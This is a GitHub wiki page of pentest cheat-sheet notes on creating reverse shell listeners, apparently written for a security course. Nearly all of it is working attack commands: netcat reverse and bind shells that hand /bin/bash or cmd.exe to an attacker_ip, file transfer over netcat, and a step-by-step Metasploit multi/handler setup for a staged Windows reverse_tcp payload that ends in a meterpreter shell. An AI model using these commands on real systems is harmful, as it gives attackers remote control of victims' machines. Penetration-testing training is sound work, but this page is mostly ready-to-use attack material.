-
Notifications
You must be signed in to change notification settings - Fork 14
Create reverse shell listener
lethanhtung01011980 edited this page Apr 23, 2020
·
12 revisions
Refs:
- Staged vs. non-stage handler: https://buffered.io/posts/staged-vs-stageless-handlers/
- Listen on TCP/UDP port for reverse shell: nc -nlvp 5678
- Connect to a netcat port: nc -nv $ip 5678
- Send a file using netcat: nc -nv $ip 5678 < /usr/share/windows-binaries/wget.exe
- Receive a file using netcat: nc -nlvp 5678 > incoming.exe
- Avoid using 4444 as other students may use it also.
- Set ftp to binary to upload exe file: ftp> binary
root@kali:~# nc -h
- -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
- -l listen mode, for inbound connects
- -n numeric-only IP addresses, no DNS
- -p port local port number
- -v verbose [use twice to be more verbose]
- -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
- -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
- Victim can ping attacker
- Attacker to listen:
nc -nlvp 4444
- Linux victim to execute reverse shell:
nc -nv attacker_ip 4444 -e /bin/bash
- Windows victim to execute reverse shell:
nc.exe -nv attacker_ip 4444 -e cmd.exe
- -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
- Attacker can ping victim
- Windows victim to listen: nc.exe -nlvp 4444 -e cmd.exe
- Linux victim to listen: nc -nlvp 4444 -e /bin/bash
- Attacker to connect to victim: nc -nv victim_ip 4444
- For UNSTAGED reversed shell: nc -nlvp 5678
- For STAGED reversed shell: (Ref: this https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit)
- msfconsole
- msf> use exploit/multi/handler
- msf (handler) > set PAYLOAD windows/shell/reverse_tcp
- msf (handler) > set LHOST Attacker_IP
- msf (handler) > set LPORT 5678
- msf (handler) > set ExitOnSession false
- msf (handler) > exploit -j
- msf exploit(handler) > sessions -i 1
- meterpreter > shell